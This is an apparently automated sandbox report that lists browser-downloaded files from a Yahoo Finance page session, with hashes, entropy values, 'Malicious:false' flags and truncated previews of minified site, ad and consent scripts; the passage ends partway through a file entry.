                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.container.yf-10zi8b3{overflow:hidden}.acc-cont.yf-kznos4.yf-kznos4.yf-kznos4{--_btn-padding-top:var(--space-3);--_btn-padding-bottom:var(--space-3);--_btn-padding-left:0;--_btn-padding-right:0;--_btn-font-size:var(--font-xl);--_btn-font-weight:var(--font-medium);--_btn-color:var(--primary);display:flex;flex-direction:column}.acc-cont.full.yf-kznos4.yf-kznos4.yf-kznos4{flex-direction:column-reverse}.acc-cont.full.yf-kznos4 .headerBtn.yf-kznos4.yf-kznos4{--_btn-padding-bottom:0;--_btn-padding-top:var(--space-5);border-top:var(--border-light);justify-content:center}.acc-cont.card.yf-kznos4.yf-kznos4.yf-kznos4{border-bottom:var(--border-light)}.acc-cont.card.topBorder.yf-kznos4.yf-kznos4.yf-kznos4{border:var(--border-light)}.acc-cont.card.topBorderOnly.yf-kznos4.yf-kznos4.yf-kznos4{border-top:var(--border-light)}.acc-cont.card.rounded.yf-kznos4.yf-kznos4.yf-kznos4{border-radius:var(--border-radius-m)}.acc-cont.card.noBorder.yf-kznos4.yf-kznos4.yf-kznos4{border:none}.acc-cont.card.dashedBd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1992)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.341125535622204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:acLCN6p9KC9ACKIStwPi/pnTEd7pUc+vX3PCJFhIBXnevn:agQC9kntkwpnA8zfPnMvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:94B700E3113BF5305B375906ED4ED357
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EBC0E5FBF97EF3EF2FDC220C89DCD869E9E5AC7C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B6E2B1024D75E182D92D00FF5C2CB42ED6D8592A2A809EB6F329428919B5B787
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:98672655608FBCAF2B2C7789646AEFBD5B01BCFF9E4BDB9BE930D3B4A08847B4CB0B5C41F816BD44CB121AF7D306B9B29B8F0B547800A52DF6F5D587082664F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/StatusTag.Cy1VuVbC.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as h,e as v,d as b,f as k,i as p,q as d,L as g,k as y,c as w,u as I,g as N,a as S,n as q}from"./scheduler.Dsuh-FKt.js";import{S as z,i as E,g as B,a as u,e as C,t as _,c as D,b as H,m as L,d as M}from"./index.CvwOawEI.js";import{I as T}from"./Icon.C8w5V9EK.js";/* empty css */const V='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill-rule="evenodd" d="M4 11h16v2H4z"/></svg>';function j(o){let t;const s=o[4].default,e=w(s,o,o[3],null);return{c(){e&&e.c()},l(a){e&&e.l(a)},m(a,l){e&&e.m(a,l),t=!0},p(a,l){e&&e.p&&(!t||l&8)&&I(e,s,a,a[3],t?S(s,a[3],l,null):N(a[3]),null)},i(a){t||(_(e,a),t=!0)},o(a){u(e,a),t=!1},d(a){e&&e.d(a)}}}function A(o){let t,s;return t=new T({props:{icon:V,size:"large",type:"tertiary"}}),{c(){D(t.$$.fragment)},l(e){H(t.$$.fragment,e)},m(e,a){L(t,e,a),s=!0},p:q,i(e){s||(_(t.$$.fragment,e),s=!0)},o(e){u(t.$$.fragment,e),s=!1},d(e){M(t,e)}}}function F(o){let t,s,e,a,l;const f=[A,j],r=[];function
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (30997)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):31091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.69327733008626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:arQmyNVTN9qyRwCBqFW8ayBrXnaxlYuG836HOS:4qqGupVBzHuG83G
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0C89D5D9B4467B7C5C6EAB7B8A42AB2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:09219346A9BA43F12A792C54D7AA519A509F71B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8007054CBB687DA8DEC06ED56B8F995E4167368F27718BDCD1E3BF8020CDF69A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7327E76F8E50BC37403ACB8845C43B4FECE69B6525EC1ED5827AFF188421B850595B4F59BEFAB1A56064BE23A9E8949634F69F088A8728F619C2037C509246DA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-28a36deb.054eec876215d316883d.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[6656],{5873:(t,e,a)=>{var i,r,o=a(4603);function l(){}l[15315]=function(){for(var t=2;9!==t;)switch(t){case 2:t="object"==typeof globalThis?1:5;break;case 1:return globalThis;case 5:var e;try{for(var a=2;6!==a;)switch(a){case 9:delete e.vfyLt,delete Object.prototype.gLJnH,a=6;break;case 3:throw"";case 4:a="undefined"==typeof vfyLt?3:9;break;case 2:Object.defineProperty(Object.prototype,"gLJnH",{get:function(){return this},configurable:!0}),(e=gLJnH).vfyLt=e,a=4}}catch(i){e=window}return e}}(),function(t){function e(t){for(;;){return[arguments][0][0].Function}}for(var a=2;81!==a;)switch(a){case 24:i[13]="z",i[73]="",i[73]="4",i[19]="H7N",a=35;break;case 86:r(o,"test",i[24],i[22]),a=85;break;case 83:r(h,i[56],i[67],i[79]),a=82;break;case 47:i[78]=i[77],i[78]+=i[77],i[78]+=i[26],i[79]=i[25],a=64;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1241)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1242
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.337308842516121
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:s6SE1VXqyELfg3jbRVYKRyz/2BvGTNUQCvHA4XY6VlZA5QUhYLvn:z3GyCKjNtq2Bv2Avg4rVlW1uvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:373B839459187FF7DB91D2BEE394432C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D8FDC0679114BF292B6C4CBADCA341515B4F28DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:148F5023B26DD087663D249106CC373895519637D61B4A6A15022B374FDD5BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2F436F149902B0877358A3EE642B6C49A59560D2F331CA636DCA5F439139FAC70CFCBEA77FCE1AC480542939A346C7381AABE2CC537067D548E8B90694CE96B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as g,A as m,e as h,d as p,f as v,i as c,q as f,L as _,k as y,_ as u,W as S}from"./scheduler.Dsuh-FKt.js";import{S as k,i as C,c as N,b as q,m as V,t as b,a as w,d as L}from"./index.CvwOawEI.js";import{g as j,a as A}from"./spread.CgU5AtxT.js";import{V as D}from"./ViewMoreLink.Bd590k7x.js";function E(l){let t,a,o,s;const r=[l[2]];let i={};for(let e=0;e<r.length;e+=1)i=m(i,r[e]);return a=new D({props:i}),{c(){t=h("div"),N(a.$$.fragment),this.h()},l(e){t=p(e,"DIV",{class:!0});var n=v(t);q(a.$$.fragment,n),n.forEach(c),this.h()},h(){f(t,"class",o="footer "+l[0]+" yf-1qpyi02"),_(t,"os",l[1])},m(e,n){y(e,t,n),V(a,t,null),s=!0},p(e,[n]){const d=n&4?j(r,[A(e[2])]):{};a.$set(d),(!s||n&1&&o!==(o="footer "+e[0]+" yf-1qpyi02"))&&f(t,"class",o),(!s||n&3)&&_(t,"os",e[1])},i(e){s||(b(a.$$.fragment,e),s=!0)},o(e){w(a.$$.fragment,e),s=!1},d(e){e&&c(t),L(a)}}}function F(l,t,a){const o=["containerClassName","onlySmall"];let s=u(t,o),{containerClassName:r=""}=t,{onlySmall:i=!0}=t;return l.$$set=e=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6758153040851855
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:h/SaNLBKpqYFCu1YSHKHg4Rcgf+F/FCD:TZBK/hYoKA4mg24D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:42F21DB36AD72C8C36A737B4C5A568D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:391A315C736001175C1CEA254C588B932260D880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:31A34028CF64A9C5415FD0E5E5920A4057FADD0B5974ADDA1D13EB45AAFFBFC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D697AEE856C373450D1762C91AACE13499E57BE53D649A91311AE87DE1494729531CC87A1970A12E70FF0533ACA91ED3BE5CCEB8A24DB5792B42288C8835B831
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/globals.D0QH3NT1.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const o=typeof window<"u"?window:typeof globalThis<"u"?globalThis:global;export{o as g};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):87389
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.375294412229756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:YOVycZ4I40pj1oBjP1ZpjnpOifu0TcuNhahw+db/3P05v:Bo0pKBjt+0ouNhardb/3P09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:66B2B6A7E55444CDB9D1F4906BC9E6D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BB7B94E10B78412D72E4C3D663C9A6DCC60FAA24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1B634260C85D8B8307F64D1BB2AFF505E3735626DA91FB6DA5E76CA6B7EC09B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3443DAC607845F85F4CCACE7B7FC0C7B551AC3BADCC6A18073CFD4C4A3CCDE6EB48683C07CBC3CADEC86F809A741745B9783F3CDF91E8BB83D014AAD95EBDDE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({reason:e,status:"rejected"})))))));const t=["localhost","aol.com","aol.co.uk","aol.de","autoblog.com","cricket.yahoo.sportz.io","engadget.com","yahoo.com","yahoo.com.hk","yahoo.com.tw"].map((e=>`([\\.\\w\\-]+\\.)?${e.replace(/\./g,"\\.")}`)),n=["cricket.yahoo.net"].map((e=>e.replace(/\./g,"\\."))),i=new RegExp(`^https?://(${t.concat(n).join("|")})(:\\d+)?$`);const s="initialize",o="initialize_ack",r="initialize_i13n",a="intersect",c="render",d="resize_ad",l="start_ads",h="tab_focus",u="block",g="index",p=!0,f="DOMContentLoaded",m="0",b="testid",y="ncid",_="fr",E="pg_name",v="type",I="benji-premium-ad",S="auto",C="VERSION",A={ATS_DIRECT:"_lr_atsDirect"};var T,w;!function(e){e.DynamicAllocation="Dynamic Allocation",e.DirectSold="Direct So
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8819), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8819
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.269015909352526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:eWAdkS5PhT9rhyb9syG8+enGtoVg75/hK2Nw81zYHmRZ1K3:eWAdkSJhT9rhyb9sLpeg75/hTF1zqmX+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7279DC4B142B3EE15916B8517C4AE42A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:83D54CDA5A164AA2016DD7A58775568295A1623F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8422D6185EB88DB7E74DBE210CF91D91A8444D8BC583E43682B029EFEF0AAF17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6F0053CED588342E2B7AFA7F8D738E215D6DF1F61F84642433617EF96C96E6F991586FACE8790CC81162F0934EFAB21C89B589BE506EAB032F4502938FFC0652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/63-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:"use strict";(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[63],{26831:(t,n,e)=>{e.d(n,{_:()=>i});var r=e(70655),o=e(46897),u=e.n(o),c=e(8388);class i extends CustomEvent{constructor(t,n=null,e){super(t,null!=n?n:void 0),Object.defineProperty(this,"meta",{configurable:!1,writable:!1,enumerable:!0,value:e})}static Dispatch(t,n=null,e){var o,a,s,l;const f=null!=e?e:{},{initiator:d}=f,v=(0,r._T)(f,["initiator"]),m=null!==(a=null===(o=null==v?void 0:v.host)||void 0===o?void 0:o.ownerDocument)&&void 0!==a?a:window.document,p=null===(s=null===u()||void 0===u()?void 0:u().safeframe)||void 0===s?void 0:s.sendMessageToHost;((null==v?void 0:v.host)&&v.host.isConnected?v.host:window.document).dispatchEvent(new i(t,n,v)),c.A7&&p&&p({action:"spotim_event",args:{type:t,params:(null==n?void 0:n.detail)||{}}}),m.dispatchEvent(new CustomEvent("ow-sdk-event",{detail:{type:t,payload:null!==(l=null==n?void 0:n.detail)&&void 0!==l?l:{}}})),m.dispatchEvent(new CustomEvent("
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1863), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1863
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.545685009070208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:C4Uqp5Utagr53kuAUiqjuasedCKAHVGaa0Bh3:C4j3k3JrA4juafdCbItC3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3CC72C4FFC7CFA2285420C36A321C8F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:00D24B3EA5600E22EBAF6040E9DDC0CDDE18DA35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A1AA12ADEB50B296381FFE3040D3D8F68B930C28D5B87593D7E4821ABD46A7B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:13E4B7A6FA26FB532494A3708310EB6D9D15DE656BED2A6C473ACFC163DAC7D05F18A81AD58FA7366B8010D884865B5B6395311732E7484D6CE3C5A20739366C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncImagePixel('https://pixel.onaudience.com/?partner=214&mapped=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://c1.adform.net/serving/cookie/match?party=14&cid=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://cms.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?idmatch=0&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://creativecdn.com/cm-notify?pi=pubmatic&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://pixel-sync.sitescout.com/dmp/pixelSync?nid=3&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://x.bidswitch.net/sync?ssp=pubmatic&gdpr=0&gdpr_consent=&us_privacy=#US_PRIVACY');PubMatic.loadAsyncImagePixel('https://pubmatic-match.dotomi.com/match/bounce/current?networkId=17100&version=1&nuid=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync.srv.stackadapt.com/sync?nid=11&gdpr=0&gdpr_consent=')
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4428)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4429
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.379740973025736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:Pl4WQnFJsVxHP5z+fxPJNMS8Qo1C9dDO6RoroQyBtR2QhBFxbKOS6YxoTWU:PxgCrPJql8QoM7DOqorny55hzl1S6Y+R
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:31211358429BC86F0FE2EF8BF232E71C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:90F2C0C6EB04C2470C2AFE5D6425A0BD2EC06278
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FF9AC4A3BE628402019BE2F26904CC44B6F60EA80026E723E7C9538C15218F69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:78039E40FB6CA09EE03B116D3752FF8D9A5FE0B27D0447366B66BD4E8DEA4FCDE6CB95E062519EAC45E0AB0719F800319A2C68F935E6566F44ED2DE532232AB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/updatePortfolioChartStore.DhAdR_DV.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as O,h as k,c as D,L as v,t as U,O as j}from"./commonUtil.BWwawKjd.js";import{f as G,l as F}from"./logUtil.CCV3qKPL.js";import{g as _}from"./loadSparkline.C8zWaz2x.js";import{n as Q}from"./server.CGBHKPKz.js";async function x(t,e){var i;const r=await O(t);if(!k(r)||!((i=r.user)!=null&&i.guid))return null;const{symbol:o,silent:s=!1,setLoading:n=!0,reuseData:l=!1}=e,[a]=await D(["portfolio"],t);if(l){const f=a.getHoldings();if(o&&f[o])return f[o];if(!o&&Object.keys(f).length>0)return f}n&&!s&&a.setLoading(!0);const c={};o&&(c.symbol=o);try{const f=await G(t,{crumb:!0,pathname:"/v1/finance/portfolio/holdings",perfLabel:"loadHoldings",query:c}),{result:d}=f.finance,p={};return d.forEach(m=>{p[m.symbol]={...m.holdings,longName:m.tickerLongName,portfolioHoldings:m.portfolioHoldings,symbol:m.symbol,tickerType:m.tickerType}}),s||a.updateHoldings(p,o,n),p}catch(f){return F(t,e,{data:f,perfLabel:"loadHoldings"}),s||a.setError(v,n),null}}const V={"1mo":"1m","6mo":"6m",ytd:"YTD",max:"Max"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):97501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.385940379434985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:2MVl7w2z7UV3a4wOc7rZo+VtgRjSgLZ2twTMQVrOxnRkIdkIdIZNJa/D:2i7w2z7Er9RjKD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C1097B147EB1D579CEF1A3842F8169A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:04CB3E6564DDC61064E7477553191FB0C33C1FE2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3D6B886E503C80DF5F51D319B3A969EE0684422336FD8787DE70AC8C1F531A51
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1C9B6669D76CDBCDEED9553838A5459092AFD0758361F1A9631B9AB9448778E69014D89D9DBF6218912AD73091027D656E0C548BBD184026D89B78D973024562
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see consent.js.LICENSE.txt */.!function(){var e={6848:function(e,n,t){var o,i,a;!function(s){"use strict";if(null!=n&&"number"!=typeof n.nodeType)e.exports=s();else if(null!=t.amdO)i=[],void 0===(a="function"==typeof(o=s)?o.apply(n,i):o)||(e.exports=a);else{var r=s(),c="undefined"!=typeof self?self:$.global;"function"!=typeof c.btoa&&(c.btoa=r.btoa),"function"!=typeof c.atob&&(c.atob=r.atob)}}((function(){"use strict";var e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";function n(e){this.message=e}return n.prototype=new Error,n.prototype.name="InvalidCharacterError",{btoa:function(t){for(var o,i,a=String(t),s=0,r=e,c="";a.charAt(0|s)||(r="=",s%1);c+=r.charAt(63&o>>8-s%1*8)){if((i=a.charCodeAt(s+=3/4))>255)throw new n("'btoa' failed: The string to be encoded contains characters outside of the Latin1 range.");o=o<<8|i}return c},atob:function(t){var o=String(t).replace(/[=]+$/,"");if(o.length%4==1)throw new n("'atob' failed: The str
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (5657)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6162
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.599076700545423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:Sb04pPhtmpvftu/PvJ/CMMKJ8UotoqzpfLEj:s0i5fPJ6FEPkIj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6AAAF8E11A32FD37FB419E3A4CE9696C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1FD88F2EE4DE5422E0C344DEBEFE3F2B5ABB2592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:468959E93F9B4E6F07C6A8F8D0E93D8FCB37D76A8615A93EC153F5842247BA99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:748B27BDB7C7FA082D7BE6C69F56DC33302105784391320A5CF960531C594097BC406FD3F4690E4CF74F4016F4D56804A4296E9BD885562EB66699E1318F7000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://f665d8114e8c2c904180d9ba9ec2b7b1.safeframe.googlesyndication.com/safeframe/1-0-40/html/container.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8">. <title>SafeFrame Container</title>. <script>.(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var f=this||self,h=function(a){return a};var n=function(a,b){this.h=a===l&&b||"";this.g=m},p=function(a){return a instanceof n&&a.constructor===n&&a.g===m?a.h:"type_error:Const"},m={},l={};var r=void 0;/*.. SPDX-License-Identifier: Apache-2.0.*/.var t,aa=function(){if(void 0===t){var a=null,b=f.trustedTypes;if(b&&b.createPolicy){try{a=b.createPolicy("goog#html",{createHTML:h,createScript:h,createScriptURL:h})}catch(c){f.console&&f.console.error(c.message)}t=a}else t=a}return t};var ca=function(a){this.g=ba===ba?a:""};ca.prototype.toString=function(){return this.g+""};var ba={},da=function(a){var b=aa();a=b?b.createScriptURL(a):a;return new ca(a)};var ea={},u=function(a,b){this.g=b===ea?a:""};u.prototype.toString=function(){return this.g.toString()};var ha=function(){var a=v,b={messa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (9109)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):9110
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4893768519886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:3C/2Ec98dS53u/kKX2XP2+y9rS4puu+u5x5vzFExJenq/NNsZ/tYg/76YnuxZJ4r:3q7i8dS53uce2/pyxD8uDTFwRuYgz6nO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6DB543C4F1DE9AC5A02419EBF40BD7B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:404D7CDB52535BECD03D014A223C51EA0ED6BA59
